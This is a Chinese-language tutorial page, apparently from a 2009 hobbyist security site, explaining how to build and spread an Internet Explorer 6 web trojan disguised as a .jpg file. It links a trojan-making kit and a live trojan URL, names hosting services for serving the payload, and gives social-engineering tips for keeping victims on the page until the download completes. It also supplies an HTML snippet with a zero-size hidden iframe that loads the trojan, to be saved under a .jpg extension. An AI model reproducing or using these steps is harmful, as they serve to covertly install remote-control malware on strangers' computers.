当前位置: 首页 > 图文教程 > 网络安全 > 安全基础 > 教你做后缀名为jpg的IE6.0网页木马

安全基础
网络协议分析软件的编写
一个SYN攻击的源程序
彻底清查带毒的Cookie
解析cookie欺骗实现过程及具体应用
从芯认识 浅谈宽带路由器处理芯片
搜索引擎也另类 想搜啥就搜啥
命令提示符恢复本地安全策略小技巧
根据PID查杀木马病毒的适用小方法
网络管理员日志之硬件修理篇
著名黑客Kevin Mitnick谈网络安全
Windows XP 常见的进程列表
网络攻击概览
爱机中毒自救六招
引起网络广播风暴的几种原因
黑客入侵36计
局域网测试及故障排除经验谈
不可忽视的BIOS参数设置
微软IE浏览器非常规修改全攻略(上)
微软IE浏览器非常规修改全攻略(下)
网管十招

安全基础 中的 教你做后缀名为jpg的IE6.0网页木马


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-28   浏览: 104 ::
收藏到网摘: n/a

血汉网页木马大家一定很熟悉了,针对各种版本IE都有效的效让很多朋友都想试一试。但是我看到很多帖子上都说自己苦于找不到支持ASP的免费空间而苦恼,正好本人手头上有一个,拿出来给大家分享!

首先送上血汗网页木马的制作工具及动画教程:
http://jdwl.net.cn/qfaq/upload/download/wymm.rar
大家看过以后就会对制作步骤成竹在胸!

ASP免费空间申请地址:http://free.63dns.com/
傻瓜式的操作。非常容易!

不过有一点我要告诉大家,这个空间不允许上传exe文件,想发木马的朋友还的麻烦一点再申请一个普通空间上传你的单一木马文件!

普通空间申请地址http://www.3322.net/cgi-bin/apply这里提供的实为收费空间,但有20天左右的免费试用期,相信对每一个只是想发木马的朋友已经足够!

另外还有一点想补充的是做好的木马并不象作者说的对任何版本都有效。但是对我自己的电脑却非常有效果,无论网页中加入的是什么EXE文件
,都能够成功的隐藏运行!我用的XP   IE6。0!可我在肉机上远程打开我的网页。10个人中大概只有5`6个吧!通过屏幕捕获查看对方的电脑,
对方的确是已经打开了我加入了木马的网页!

成功使用网页木马最重要的一点个人经验告诉大家,连接着木马的网页要做的够吸引人,不一定是豪华,但一定要吸引人,记住。一定要吸引人,要让对方在你的主页上停留时间达到他的电脑下载木马所需要的时间够长,少一秒都不行,尤其是你的网页中加入的是象灰鸽子这样大服务端的情况!否则等木马还没有下载完的时候对方就关闭了你的网页,那就前功尽弃!一切都是白干!

相信大家都有过这样的经历,当你打开了一个不知名的网页,发现里面什么都没有,或者是极其简陋,就算当时你没有任何的防护心理,你也会随手将其关闭对不对!
   
成功种植木马不光需要优秀的制作工具,还搀杂着社会工程学和心理学,这点应该很多人都明白,,这里推荐一款优秀的网页制作工具---东方网页王III  ,傻瓜式的操作就能够制出精美的网页,网页上的文字和图片包括多媒体的坐标可以随意定位!不需要你懂的任何HTML语言!所见即所得!
具体下载地址这里就不写上了,大家只要到任何一个搜索引擎里打上--东方网页王III,很快就能找到一大堆下载地址!

这里送上对我自己非常有效的网页木马地址,供大家参阅,看看你的电脑是不是和我一样,呵呵 
http://vod520.3322.net/11/068.jpg[已取消里面的EXE文件]
如果有效,结果为你的屏幕左右来回滚动约10秒钟!纯属恶作剧,对系统无任何危害,,本人以人格担保,里面决无危害他人安全及隐私的内容如
有其他现象发生,您竟可骂娘!。欢迎大家积极点击!

另附:此木马对无盘系统无效。比如有很多网吧就是无盘系统!还有一个就是对系统没有安装在C盘的无效。如果要有效果。必须修改制作摸板,不建议你做此尝试!

最后是此篇的精华,请仔细看:一般来说,我们做出来的网页木马地址都是以 htm 或html 结尾!我们可以那这个后缀名修改成 jpg.你知道怎么修改吗,不知道的话请接着仔细看!
不知道大家知道不知道。IE有一个很小的BUG。即只要网站文件里有html码它就会执行,并不理会文件后缀名是什么。

于是我们可以这么来修改网页木马的后缀名,其实说准确一点并不是修改点网页木马的地址后缀名,是利用一个图片地址来打开这个网页木马!

打开记事本写入如下一段代码:
<html>
<iframe src="IE6。0网页木马地址" width="0" height="0" frameborder="0"></iframe>
<center><img src="图片地址"></center>
</html>
然后将其另存为XXX.jpg  。 

剩下的工作就是将这个XXX.jpg图片格式的文件上传的你的空间,给出相对路径让别人访问了!

别人在访问这个XXX.jpg文件时。。浏览器会将文件内的html码执行,根据代码的内容。你的网页木马地址会作为隐藏窗口被打开。。另外那个图片也会出现在对方所打开的网页上!


好了。就到这里。祝大家玩马愉快!